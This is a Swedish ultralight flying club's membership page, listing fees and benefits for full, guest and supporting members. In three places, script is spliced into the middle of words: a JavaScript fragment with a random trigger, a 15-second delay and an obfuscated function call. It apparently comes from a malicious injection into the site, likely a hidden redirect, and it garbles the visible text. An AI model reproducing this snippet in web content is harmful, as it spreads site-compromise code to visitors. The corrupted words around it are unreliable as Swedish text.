Medlemskap

Med­lem­skap i Borås Ult­ralätt Flyg­klubb är öppet för alla som vill lära sig att flyga eller på ide­ella grun­der vara med och utveckla den ult­ralätta flyg­spor­ten genom klub­bens verk­sam­het. För med­lems­av­gif­ten, se lis­tan nedan.

När avgif­ten är betald via BG 914‑6358 får du ett med­lems­num­mer från kas­sö­ren som kvitto på ditt med­lems­skap. Glöm inte att ange namn, adress och e-post!

Full­be­talandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande med­lem: 1.450 kr/år

  • Med­lem­skap i Borås Ult­ralätt Flyg­klubb (BUFK)
  • Med­lem­skap i Kung­liga Svenska Aero­klub­ben (KSAK), huvud­or­ga­ni­sa­tion för klubb­flyg i Sverige
  • Med­lem­skap i Motor­flyg­för­bun­det, sek­tion inom KSAK som skö­ter UL-frågor, lärar­ut­bild­ning m.m.
  • Med­lem­skap i Flyg­sport­för­bun­det som har handom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and om täv­lingar m.m. En viss för­säk­ring ingår.

Gäst­med­lem: 1.000 kr/år

  • Gäst­med­lem beta­lar enbart avgif­ten till BUFK och för­ut­sätts betala avgif­ter till KSAK/KSAK-M genom annan klubb.

Stödjandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande med­lem: 500 kr/år

  • Kan vara per­son eller före­tag som vill bidra till verksamheten.